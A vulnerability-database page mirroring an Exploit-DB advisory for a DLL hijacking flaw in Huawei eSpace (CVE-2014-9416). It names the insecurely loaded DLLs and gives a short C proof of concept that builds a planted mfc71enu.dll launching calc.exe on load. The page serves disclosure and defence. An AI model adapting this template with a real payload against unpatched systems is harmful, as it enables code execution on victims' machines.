Lucene search
K

Huawei eSpace 1.1.11.103 - DLL Hijacking

🗓️ 20 May 2019 00:00:00Reported by LiquidWormType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 141 Views

eSpace 1.1.11.103 DLL Hijacking Vulnerability in Huawei Technologies Co., Ltd. product

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Huawei eSpace 1.1.11.103 - DLL Hijacking Exploit
19 May 201900:00
zdt
CNVD
Huawei eSpace Desktop V200R003C00 has multiple untrusted search path vulnerabilities
4 Jan 201500:00
cnvd
CVE
CVE-2014-9416
24 Dec 201418:00
cve
Cvelist
CVE-2014-9416
24 Dec 201418:00
cvelist
EUVD
EUVD-2014-9237
7 Oct 202500:30
euvd
exploitpack
Huawei eSpace 1.1.11.103 - DLL Hijacking
20 May 201900:00
exploitpack
Huawei
Security Advisory-Multiple Vulnerabilities in Huawei eSpace Desktop Product
17 Dec 201400:00
huawei
NVD
CVE-2014-9416
24 Dec 201418:59
nvd
Packet Storm
Huawei eSpace 1.1.11.103 DLL Hijacking
17 May 201900:00
packetstorm
Prion
Design/Logic Flaw
24 Dec 201418:59
prion
Rows per page
/*

Huawei eSpace Desktop DLL Hijacking Vulnerability


Vendor: Huawei Technologies Co., Ltd.
Product web page: https://www.huawei.com
Affected version: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC)

Summary: Create more convenient Enhanced Communications (EC) services for your
enterprise with this suite of products. Huawei’s EC Suite (ECS) solution combines
voice, data, video, and service streams, and provides users with easy and secure
access to their service platform from any device, in any place, at any time. The
eSpace Meeting allows you to join meetings that support voice, data, and video
functions using the PC client, the tablet client, or an IP phone, or in a meeting
room with an MT deployed.

Desc: eSpace suffers from a DLL Hijacking issue. The vulnerability is caused due
to the application loading libraries (mfc71enu.dll, mfc71loc.dll, tcapi.dll and 
airpcap.dll) in an insecure manner. This can be exploited to load arbitrary libraries
by tricking a user into opening a related application file (.html, .jpg, .png)
located on a remote WebDAV or SMB share.

Tested on: Microsoft Windows 7 Professional


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

19.08.2014

Patched version: V200R003C00
Vuln ID: HWPSIRT-2014-1153 and HWPSIRT-2014-1154
CVE ID: CVE-2014-9416
Advisory: https://www.huawei.com/en/psirt/security-advisories/hw-406589

*/


// gcc -shared -o mfc71enu.dll exploit.c

#include <windows.h> 

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved)
{
	exec();
	return 0;
}

int exec()
{
	WinExec("calc.exe" , SW_NORMAL);
	return 0;
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation